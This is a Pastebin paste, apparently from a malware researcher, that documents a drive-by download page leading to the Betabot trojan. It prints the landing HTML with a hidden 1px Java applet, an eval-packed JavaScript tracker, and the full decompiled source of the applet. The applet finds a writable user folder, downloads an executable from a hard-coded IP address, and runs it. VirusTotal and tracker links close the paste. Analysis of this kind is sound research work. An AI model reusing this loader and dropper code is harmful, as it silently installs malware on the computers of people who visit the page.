API tools faq
paste
Advertisement
Xylitol

Malicious java leading on Betabot

Xylitol
Apr 20th, 2014
358
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.81 KB | None | 0 0
raw download clone embed print report
  1. index.html:
  2. <html>
  3. <head>
  4. <title>Welcome</title>
  5. <script language="javascript" src="6JVia9.js"></script>
  6. <applet width='1px' height='1px' code='Java.class' archive='Java.jar' name='ATG-Security'></applet>
  7. </head>
  8. <body>
  9.  
  10. </body>
  11. </html>
  12.  
  13. ==============================================================================
  14.  
  15. 6JVia9.js:
  16. https://www.virustotal.com/en/file/99225bbbb0b83fc3523b6a2c72ef239d24520311802434346fc6d550b5e45a03/analysis/1397995795/
  17.  
  18. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(c/a))+String.fromCharCode(c%a+161)};while(c--){if(k[c]){p=p.replace(new RegExp(e(c),'g'),k[c])}}return p}('і(­(p,a,c,k,e,d){ґ(c--){«(k[c]){p=p.Є(© ¬(\'\\\\b\'+c+\'\\\\b\',\'g\'),k[c])}}± p}(\'З(¶(Ґ,Ў,ў,¦,¤,Ё){¤=¶(ў){µ(ў<Ў?\\\'\\\':¤(К(ў/Ў)))+((ў=ў%Ў)>В?ё.»(ў+А):ў.О(Ю))};Э(ў--){Ь(¦[ў]){Ґ=Ґ.Я(а д(\\\'\\\\\\\\Ј\\\'+¤(ў)+\\\'\\\\\\\\Ј\\\',\\\'§\\\'),¦[ў])}}µ Ґ}(\\\'ў Ї="б";ў §="Щ.Ш-Х.е";ў Ў=["Ц","Ч","Ґ","Ф://","/У/П=Р.С.Т?¤=0&¦=","&Ъ=","г","Ы","¤","Н/Ѕ","ј","ѕ","ї"];Ј=Ё[Ў[1]](Ў[0]);Ј[Ў[2]]=Ў[3]+§+Ў[4]+Ї+Ў[5]+є(·[Ў[7]][Ў[6]]);Ј[Ў[8]]=Ў[9];Ё[Ў[№]](Ў[Б])[0][Ў[Й]](Ј);\\\',І,І,\\\'||||||||||Л|М|И|Г|Д|Е||Ж|в||ўВ|ўЇ|ў®|ў°|ў±|ж|ўІ|ў­|ў¬|ў§|ў¦|ўЁ|ў©|ў«|ўЄ|ўі|ўґ|ўѕ|ўЅ|ўї|ўА|ўБ|ўј|ў»|®\\\'.ў¶(\\\'|\\\')))\',®,ўµ,\'|||||||||||||a|c|e|b|p|k|g|d|±|­|j|l|o|f|h|ў·||n|A|G|°|H|||і|B|i|x|m|¬|t|s||©|Є|ўё|ґ|«|r|q|D|w|z|y|v|u|ўє|ў№|C|ўҐ|ў¤|р|п|с|т|у|о|н|и|з|й|к|м|л|ф|х|я|ю|ўЎ|ўў|ўЈ|I|э|E|F|ь|ч|ц|ш|щ|ы|ъ\'.°(\'|\')))',95,129,'13|14|16|15|17|18|19|20|new|replace|if|RegExp|function|10|23|split|return|45|eval|while|21|22|53|59|86|61|60|31|38|34|32|29|87|35|94|93|92|91|37|90|84|28|85|89|40|48|41|39|27|26|55|54|52|57|56|51|44|30|24|50|49|36|47|46|43|88|25|42|58|67|http|script|encodeURIComponent|window|head|getElementsByTagName|href|website|net|changeme|tracker|src|location|javascript|appendChild|var|scriptNode|js|php|document|type|getip|_0|createElement|text|wtf|username|callback|www|super|65|64|71|72|80|79|63|62|83|68|69|70|66|81|78|95|33|parseInt|toString|fromCharCode|String|76|75|73|77|74|12|11|82'.split('|')))
  19.  
  20. ==============================================================================
  21.  
  22. java.jar:
  23. https://www.virustotal.com/en/file/f0bbaadeb7eafe655ff06137de9324f97a71de24a4461458f4f3be97f9f564e6/analysis/1397995393/
  24.  
  25. import java.applet.Applet;
  26. import java.applet.AppletContext;
  27. import java.io.File;
  28. import java.io.FileOutputStream;
  29. import java.io.IOException;
  30. import java.net.URL;
  31. import java.nio.channels.Channels;
  32. import java.nio.channels.FileChannel;
  33. import java.util.Random;
  34.  
  35. public class Java extends Applet
  36. {
  37. public static String Author = "Created by Foxxy Software. | foxxysoftware.in";
  38.  
  39. public static int LKC(int paramInt) {
  40. return paramInt - paramInt;
  41. }
  42.  
  43. public void IKD(AppletContext paramAppletContext) {
  44. try {
  45. paramAppletContext.showDocument(new URL(""), "");
  46. System.exit(LKC(Integer.parseInt("3")));
  47. } catch (IOException localIOException) {
  48. System.exit(LKC(Integer.parseInt("3")));
  49. }
  50. }
  51.  
  52. public void init() {
  53. String[] arrayOfString1 = { "r-i-d" + "p-m-t".concat(".-o-i").concat(new StringBuilder().append(".-a-L".replace("L", "")).append("v-a-j").toString()), "A-T-A".concat("D-P-P") + "A-F-L".replace("F", "").replace("L", ""), "e-m-o" + "h-.-r".concat("e-s-u"), null, null, null, "23" };
  54. String[] arrayOfString2 = { String.valueOf(false), "", ".exe" };
  55.  
  56. for (int i = LKC(Integer.parseInt("3")); i < 2; i++) {
  57. arrayOfString1[i] = new StringBuilder(arrayOfString1[i].replaceAll("-", "")).reverse().toString();
  58.  
  59. if (arrayOfString1[i].toLowerCase().contains("app"))
  60. arrayOfString1[Integer.parseInt("3")] = System.getenv(arrayOfString1[i]);
  61. else {
  62. arrayOfString1[Integer.parseInt("3")] = System.getProperty(arrayOfString1[i]);
  63. }
  64.  
  65. if ((arrayOfString1[Integer.parseInt("3")] != null) && (new File(arrayOfString1[Integer.parseInt("3")]).exists()) && (new File(arrayOfString1[Integer.parseInt("3")]).canWrite()) && (new File(arrayOfString1[Integer.parseInt("3")]).isDirectory())) {
  66. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].replace("\\", "/");
  67. if (!arrayOfString1[Integer.parseInt("3")].endsWith("/")) {
  68. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].concat("/");
  69. }
  70. arrayOfString1[Integer.parseInt("3")] = arrayOfString1[Integer.parseInt("3")].concat(Long.toString(Math.abs(new Random().nextLong()), Integer.parseInt(arrayOfString1[(Integer.parseInt("3") + Integer.parseInt("3"))])).replaceAll("[0-9]", "") + arrayOfString2[(Integer.parseInt("3") - 1)]);
  71. break;
  72. }
  73. }
  74. try
  75. {
  76. FileOutputStream localFileOutputStream = new FileOutputStream(arrayOfString1[Integer.parseInt("3")]);
  77. localFileOutputStream.getChannel().transferFrom(Channels.newChannel(new URL("http://193.107.17.11/winpeace.exe").openStream()), LKC(Integer.parseInt("3")), 9223372036854775807L);
  78. localFileOutputStream.close();
  79.  
  80. Runtime.getRuntime().exec(arrayOfString2[(Integer.parseInt("3") - 2)] + arrayOfString1[Integer.parseInt("3")]);
  81.  
  82. if (arrayOfString2[0] == String.valueOf(true)) {
  83. IKD(getAppletContext());
  84. }
  85.  
  86. System.exit(LKC(Integer.parseInt("3")));
  87. } catch (IOException localIOException) {
  88. System.exit(LKC(Integer.parseInt("3")));
  89. }
  90. }
  91. }
  92.  
  93. ==============================================================================
  94.  
  95. http://193.107.17.11/winpeace.exe <- Betabot
  96. http://cybercrime-tracker.net/index.php?search=notchangeme.su
  97. --> http://3.bp.blogspot.com/-1xuhhlJ87hE/U1KWeSJ74sI/AAAAAAAAlrs/oMs2iaIqK2Y/s1600/19-04-2014+17-28-54.png
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!